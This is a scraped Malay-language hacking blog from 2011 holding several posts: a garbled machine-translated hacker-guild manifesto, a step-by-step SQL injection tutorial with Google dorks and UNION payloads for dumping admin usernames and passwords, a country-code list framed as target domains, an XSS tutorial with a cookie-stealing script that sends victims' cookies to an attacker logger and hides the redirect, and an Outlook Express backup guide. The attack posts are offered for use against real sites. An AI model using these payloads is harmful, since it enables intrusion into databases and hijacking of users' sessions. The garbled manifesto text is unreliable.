keahlian. Telekomunikasi sumber juga akan diminta
sebagai sumbangan daripada pembekal, atas saran tidak-terlalu-halus
bahawa ketersediaan sumber daya tersebut dalam konteks seperti adalah
kondusif untuk warga terampil developmentof bukan
antisosial penyerang. Melalui sumber ini Kumpulan akan
mengekalkan struktur yang lebih besar, yang akan komunikasi-
berdasarkan overlay rangkaian dan-iklan hocracies.

Melalui struktur ini conflicitng kedudukan boleh
dibincangkan dan diperdebatkan dalam demokrasi partisipatif berfungsi.
Maklumat plebisit akan dilakukan baik sebagai sarana
senseof yang menentukan Kumpulan pada isu-isu importsnce dan sebagai
projek pembangunan menguji kemampuan maklumat
teknologi di bawah pelbagai tatacara penggunaan. Tertinggi
struktur orgnization akan berada di peringkat tempatan, dan
pentadbir pada tahap yang lebih luas mungkin dibekalkan tajuk, seperti
Petugas kebersihan, yang cenderung untuk mengelakkan perkara mengiklankan dan pemuliaan diri.
kuasa budiman akan dipelihara dalam Liga sebagai
menentang kuasa kedudukan.

pendatang baru itu akan kemajuan dari membina nya
tahap kemahiran proses menjelajah program yang sedia
pengembangan diri. Ini mungkin untuk mencadangkan tertentu
berbeza dari mata kuliah yang disyorkan sahaja. pendatang baru ini
kemudian akan terlibat dalam projek-projek yang memerlukan pembaikan dalam
kemahiran peringkat di bawah kawalan atau ulasan terhadap terampil kompeten
ahli.

Ini harus dilihat sebagai pembangunan profesional (di mana
kata tidak mempunyai konotasi "carian nafkah") dan sejak itu
merupakan tanggung jawab dari semua profesional untuk mengajar dan menularkan
kemahiran mereka, pendatang baru di sepanjang jalan akan diharapkan
melakukan sebagai pengajar dan kemudian penyelia dan mentor untuk masa depan
pendatang baru. Dengan demikian, kemajuan dalam pembangunan diri tidak akan
hanya masalah daripada "hacks rapi" satu boleh menyelesaikan, tapi
akan memerlukan integrasi ke dalam masyarakat pertama hacker,
maka masyarakat yang lebih luas. Tidak ada alasan mengapa teknologi
harus bergantung pada orang lain untuk mewakili pekerjaan mereka kepada awam atau
kerajaan.

Salah satu fungsi perkhidmatan awam yang dilakukan oleh
ahli Kumpulan Hacker (dan prestasi ini akan menjadi
secara jelas dilakukan oleh ahli dan bukan oleh
"Organisasi") akan konsultasi tentang keselamatan maklumat
dan integriti komunikasi dalam masyarakat sehari-hari. Members
dari Kumpulan akan menyediakan perkhidmatan analisis proposal,
penyiasatan penyalahgunaan sistem dan mengejar pelaku yang
akan berehat pada pondasi profesional itsown daripada melayani
langsung komersil berakhir yang mungkin menyimpangkan kesimpulan
penyiasatan.

Untuk menggunakan metafora popular, ahli Kumpulan ofthe Hacker
boleh dibandingkan dengan doktor di Frontier Elektronik, dengan
persatuan perubatan mereka sendiri longgar untuk menjaga perdukunan di teluk dan
melayani fungsi kesihatan masyarakat. Atau mungkin analogi mungkin
adalah untuk guru sekolah yang juga menulis sastera dan sastera
kritik, serta turningout karya seni dan menyusun
kritik yang sama. Jelas, ruangan metaforik keperluan
bekerja.

Satu boleh berharap untuk keadaan material betterone melalui
menyertai inthe rangkaian hubungan yang akan menjadi
Hacker Kumpulan, jika seseorang memiliki kemahiran dan bakat untuk meningkatkan
seseorang kemahiran. Jika tidak, maka akan ada malu untuk berhenti
penyertaan. Fungsi penting dari Kumpulan adalah untuk
menggalakkan tidak cekap untuk pergi ke tempat lain tanpa opprobium.
Mereka mungkin muncul sebagai pentadbir dalam industri, dan
adalah tidak ada bunga yang 'untuk itu menjadi hubungan bermusuhan berdasarkan
atas "pecundang" status.

Bahkan, Hacker Kumpulan akan menjadi cara untuk membunuh dengan
yang "pemenang / pecundang" dikotomi. Jika anda cuba, anda menang untuk beberapa
darjah, dan lebih muda ahli yang tidak selamat dalam diri mereka sendiri perlu
mempelajari hal ini, kadang-kadang pada peringkat putus asa. Satu boleh mengambil lebih
thnone dapat menangani, dibenarkan untuk gagal dengan sokongan dari orang-orang
lebih berpengalaman, dan tidak menimbulkan kos yang sebenarnya atau emosional yang
dinyatakan akan membuat salah satu dari eksperimen tersebut. The
Hacker Kumpulan tidak akan berfungsi tanpa gelaran terukur
dari jujur memenangi kegagalan pada anggota partofits.

Apakah jenis projek yang akan dilakukan? Mungkin
pembangunan sistem operasi terdistribusi yang sesuai untuk
rangkaian peranti cerdas beraneka ragam; depan elegan pengguna-
berakhir dan persekitaran pembangunan untuk sistem intuitif
tatarajah; pidato pidgin (bahasa tidak alami) pengakuan
sistem, struktur baru dari groupware; posibly rangkaian saraf di
tahap yang lebih tinggi.

Tapi ini dugaan saya sendiri, dan apa yang akan benar-benar
berlaku hampir pasti membuat tebakan terlihat
ridiculously kuno dan primitif. Mari kita berikan kesempatan untuk
berlaku.

sql injection

Dicatat oleh NICK KLUANG Saturday, January 29, 2011


Sql Injection Tutorial

>>Info<<

Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x


Google Dork yang akan di gunakan ialah "inurl:news.php?id="

Langkah Pertama

[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh:

code:

[site]/news.php?id=1'
atau
[site]/news.php?id=-1

contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Langkah Kedua


Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url

Contoh:

Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar

untuk tutorial ini jumlah table yg diperolehi ialah 3.

Langkah Ketiga

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka 2,

contoh:

[site]/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan

Langkah Keempat

untuk nampakkan nama2 table yang ada di wenb tersebut, perintah

Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:

[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Langkah KeLima

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

Langkah Ke Enam

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)


------
|info|
------

Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

Langkah Ketujuh

Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

Langkah Terakhir:

Cari Login untuk admin..






Selamat Mencuba.....

id kode untuk setiap negara

Dicatat oleh NICK KLUANG








ID CODE UNTUK SETIAP NEGARA
Country Code




Afghanistan AF
Albania AL
Algeria DZ
American Samoa AS
Andorra AD
Angola AO
Anguilla AI
Antarctica AQ
Antigua and Barbuda AG
Argentina AR
Armenia AM
Aruba AW
Australia AU
Austria AT
Azerbaijan AZ
Bahamas BS
Bahrain BH
Bangladesh BD
Barbados BB
Belarus BY
Belgium BE
Belize BZ
Benin BJ
Bermuda BM
Bhutan BT
Bolivia BO
Bosnia and Herzegovina BA
Botswana BW
Bouvet Island BV
Brazil BR
British Indian Ocean Territory IO
Brunei Darussalam BN
Bulgaria BG
Burkina Faso BF
Burundi BI
Cambodia KH
Cameroon CM
Canada CA
Cape Verde CV
Cayman Islands KY
Central African Republic CF
Chad TD
Chile CL
China CN
Christmas Island CX
Cocos (Keeling) Islands CC
Colombia CO
Comoros KM
Congo CG
Congo, Democratic Republic CD
Cook Islands CK
Costa Rica CR
Cote d'Ivoire CI
Croatia HR
Cyprus CY
Czech Republic CZ
Denmark DK
Djibouti DJ
Dominica DM
Dominican Republic DO
East Timor TL
Ecuador EC
Egypt EG
El Salvador SV
Equatorial Guinea GQ
Eritrea ER
Estonia EE
Ethiopia ET
Falkland Islands (Malvinas) FK
Faroe Islands FO
Fiji FJ
Finland FI
France FR
French Guiana GF
French Polynesia PF
French Southern Territories TF
Gabon GA
Gambia GM
Georgia GE
Germany DE
Ghana GH
Gibraltar GI
Greece GR
Greenland GL
Grenada GD
Guadeloupe GP
Guam GU
Guatemala GT
Guinea GN
Guinea-Bissau GW
Guyana GY
Haiti HT
Heard and McDonald Islands HM
Honduras HN
Hong Kong HK
Hungary HU
Iceland IS
India IN
Indonesia ID
Iraq IQ
Ireland IE
Israel IL
Italy IT
Jamaica JM
Japan JP
Jordan JO
Kazakhstan KZ
Kenya KE
Kiribati KI
Kuwait KW
Kyrgyzstan KG
Lao People's Democratic Republic LA
Latvia LV
Lebanon LB
Lesotho LS
Liberia LR
Libya LY
Liechtenstein LI
Lithuania LT
Luxembourg LU
Macau MO
Macedonia MK
Madagascar MG
Malawi MW
Malaysia MY
Maldives MV
Mali ML
Malta MT
Marshall Islands MH
Martinique MQ
Mauritania MR
Mauritius MU
Mayotte YT
Mexico MX
Micronesia FM
Moldova MD
Monaco MC
Mongolia MN
Montserrat MS
Morocco MA
Mozambique MZ
Namibia NA
Nauru NR
Nepal NP
Netherlands NL
Netherlands Antilles AN
New Caledonia NC
New Zealand NZ
Nicaragua NI
Niger NE
Nigeria NG
Niue NU
Norfolk Island NF
Northern Mariana Islands MP
Norway NO
Oman OM
Pakistan PK
Palau PW
Palestinian Territory PS
Panama PA
Papua New Guinea PG
Paraguay PY
Peru PE
Philippines PH
Pitcairn PN
Poland PL
Portugal PT
Puerto Rico PR
Qatar QA
Reunion RE
Romania RO
Russian Federation RU
Rwanda RW
Saint Kitts and Nevis KN
Saint Lucia LC
Saint Vincent and the Grenadines VC
Samoa WS
San Marino SM
Sao Tome and Principe ST
Saudi Arabia SA
Senegal SN
Serbia and Montenegro CS
Seychelles SC
Sierra Leone SL
Singapore SG
Slovakia SK
Slovenia SI
Solomon Islands SB
Somalia SO
South Africa ZA
South Georgia and The South Sandwich Islands GS
South Korea KR
Spain ES
Sri Lanka LK
St. Helena SH
St. Pierre and Miquelon PM
Suriname SR
Svalbard and Jan Mayen Islands SJ
Swaziland SZ
Sweden SE
Switzerland CH
Taiwan TW
Tajikistan TJ
Tanzania TZ
Thailand TH
Togo TG
Tokelau TK
Tonga TO
Trinidad and Tobago TT
Tunisia TN
Turkey TR
Turkmenistan TM
Turks and Caicos Islands TC
Tuvalu TV
Uganda UG
Ukraine UA
United Arab Emirates AE
United Kingdom GB
United States US
United States Minor Outlying Islands UM
Uruguay UY
Uzbekistan UZ
Vanuatu VU
Vatican VA
Venezuela VE
Viet Nam VN
Virgin Islands (British) VG
Virgin Islands (U.S.) VI
Wallis and Futuna Islands WF
Western Sahara EH
Yemen YE
Zambia ZM
Zimbabwe ZW


sebagai contoh www.target.com.my
www.target.com.zw

xss script untuk hacker

Dicatat oleh NICK KLUANG

XSS Tutorial

--==[Cr0ss-Site Scripting]==--

Apakah itu Xss(Cross-Site scripting)?

XSS, singkatan dari apa yang dikenali sebagai Cross-Site Scripting adalah proses menyuntik JavaScript (terutama) dan juga HTML ke sebuah laman web untuk maklum balas penting. Ulasan ini mungkin mengandungi banyak hal, salah, paling sering menjadi cookies pengguna. Sekarang, untuk semua orang membaca ini, saya berasumsi bahawa anda tahu apa cookies dan bagaimana ia digunakan pada laman web, tetapi jika tidak, saya akan menjelaskan anyways.


Kuki adalah pembolehubah yang web-browser gunakan untuk menyimpan log masuk anda. Tanpa cookies, anda tidak boleh "tetap masuk dalam" di laman web kegemaran anda. Hal ini penting kerana jika seseorang adalah untuk mendapatkan cookies anda, dia dengan mudah boleh spoof maklumat login anda tanpa perlu mengetahui password anda. Beberapa cookies cukup mendasar, seperti PHPSESSID, yang hanya sesi anda pada laman PHP powered. Jika website hanya menggunakan cookies PHPSESSID untuk mengesahkan penggunanya, seseorang dapat mencuri cookies melalui kerentanan XSS dan spoof siapa pun yang memiliki cookies penyerang.

"Hampir 90% website terdedah kepada serang XSS, tidak terkecuali website kerajaan"

--==[Dua Method Serangan XSS]==--

a) Dasar XSS (user-bentuk merefleksikan kembali XSS).
b) Memisahkan HTTP Respon.

1. Dasar XSS
a. Ini adalah sesuatu yang sederhana, seperti medan carian yang membolehkan masukkan HTML. Apabila pengguna mencari untuk sesuatu dan input tercermin pada halaman berikut, ini mungkin menunjukkan tanda-tanda kemungkinan XSS. Sekarang, ketika pengguna mencari sesuatu seperti

contoh :

Jika script (1) akan memaparkan kotak
www.nickkluang.blogspot.com
Jika untuk (2) akan terhasilnya tulisan di page.
www.nickkluang.blogspot.com
--==[Cara Bagaimana hendak mencuri Cookies melalui XSS attack]==--

[Code]


Ini adalah yang paling asas JavaScript untuk usaha mencuri cookies. Inilah yang kemungkinan besar akan ditempatkan di dalam salah satu daripada banyak fail. Js yang diambil oleh pelayan remote.

Script ini akan mengarahkan semula laman web untuk http://site.com/log.php?c [MEREKA COOKIE] = & redirect = http://siteb.com

GET c pembolehubah mengandungi cookies pengguna daripada laman berikut. Bahagian redirect hanyalah GET var yang akan mengarahkan mereka dari logger, untuk website lain, sehingga mereka tidak melihat TERLALU sesuatu yang aneh. Cara terbaik untuk mengelakkan kecurigaan adalah untuk mengarahkan mereka ke halaman yang sama, hanya halaman yang berbeza.

Keterangan JavaScript jika anda belum tahu itu:
document.location = ""; atau document.location (); adalah fungsi dalam JavaScript bahawa perubahan dokumen (halaman web)
lokasi. document.cookie adalah cara JavaScript cookies menyimpan maklumat pada sebuah laman web. Kebanyakan semuanya
dapat dipanggil dari dokumen .* apapun.


--==[Scripts Dan Syntax untuk log.php dan H3x4.js]==--

-Evil.js

document.location="http://yoursite.com/logger.php?cookie="+document.cookie+"&redirect=http://theirsite.com/diff_page.php";

-Log.php



kemudian simpan di remote server (server anda)

cara Backup dan Restore Email Outlook Express

Dicatat oleh NICK KLUANG Friday, January 28, 2011

Setelah berusaha mencari tahu di internet untuk menemukan bagaimana cara melakukan backup email yang ada di inbox outlook express bahwa sudah beberapa kali namun tidak menemukan cara yang tepat untuk membacup data email. Oleh karena kebutuhan sangat mendesak dan harus backup email akhirnya saya mencoba mencaritahu dari menu-menu yang ada di outlook express untuk melakukan backup email.

Setelah try and error akhirnya usaha saya untuk membackup semua email yang ada di inbox outlook express pun berhasi sampai dengan merestore kembali email tersebut di outlook express. Bagi sobat yang ingin tau bagaimana cara membackup email dari outlook express dan merestore kembali ke outlook express lihat tipsnya berikut ini.

Pertama masuk dulu ke outlook express.

Klik menu File - Export - Messages

Akan muncul pesan "This will export messages from outlook express to microsoft outlook or microsoft exchange" klik OK saja.

Pada jendela export messagespilih folder yang ingin di export atau gunakan all folders untuk mengexport semua folder kemudian klik OK

Langkah pertama sudah selsai

Langka kedua masuk ke Microsoft Outlook

Klik menu File - Import and Export sehingga muncul jendela Import and export wizard

Pilih Import internet mail and address lanjutkan dengan klik Next

Pada jendela outlook import tool, pilih outlook express 4.x,5.x,6.x dan centangkan

Import mail, import address book dan import rules kemudian klik Next

Pada jendela import address pilih options Replace duplicates with items imported jika ingin menimpah alamat yang sudah ada, Allow duplicates to be created bila ingin menyimpan juga alamat import meskipun ada alamat yang sama dan pilih Do not import duplucate items untuk tidak mengimport alamat yang sama.

Saran saya gunakan options ke dua yaitu Allow duplicates to be created dan lanjutkan dengan klik finish dan tunggu proses import hingga selesai kemudian klik save in inbox dan muncul sebuah pesan di inbox yang menyatakan bahwa total mail yang diimport ke dalam inbox.

Sampai di sini belum selesai, kita harus membackup semua email yang ada di inbox microsoft outlook tersebut menjadi sebuah file sehingga bisa dibawa ke mana-mana misalnya di copy ke flash disk atau media penyimpan data lainnya seperti cd atau ke komputer lain.

Masih berada di microsoft outlook klik menu File - import and export sehingga muncul jendela Import and export wizard

Pada jendela Import and export wizard Klik Export to a file dan klik Next

Pada jendela Export to a file klik Personal Folder File (.pst) dan klik Next

Pada jendela Export Personal Folders pilih Inbox dan jangan lupa centang pada Include Subfolders bila ada sub folder, kalau tidak adan sub folder maka tidak perlu di centang dan selanjutnya klik Next

Ketik nama file misalnya "backup.pst" dan Klik browse untuk menentukan tempat menyimpan file backup email tersebut misalnya di drive D:\> kemudian klik Finish.

Demikian langkah melakukan backup email outlook express.

Selanjutnya mari kita melakukan restore email outlook express.

Caranya masih sama seperti melakukan backup hanya untuk melakukan restore urutannya
sebaliknya.

Pertama jalankan terlebih dahulu microsoft outlook

Klik menu File - Import and export

Pada jendela Import and export wizard pilih Import from another program or file dan klik Next
Di jendela Import a file pilih Personal Folder File (.pst) dan klik Next

Klik browse dan cari file backup yang sudah kita backup tadi misalnya dengan nama file "backup.pst" dan klik Next

Terakhir klik Finish sehingga semua email yang dibackup tadi masuk ke inbox microsoft outlook.

Karena rencana kita adalah restore email pada inbox outlook express maka jalankan outlook express.

Klik menu File - Import - Messages sehingga muncul jendela Outlook Express Import, dan klik Microsoft Outlook kemudian klik Next

Centang pada All folders dan klik Next, tunggu hingga proses import selesai dan klik Finish

Semua langkah untuk melakukan backup email outlook express hingga merestorenya kembali sudah selesai dan selamat mencoba semoga bermanfaat.



nuff

comment

page transate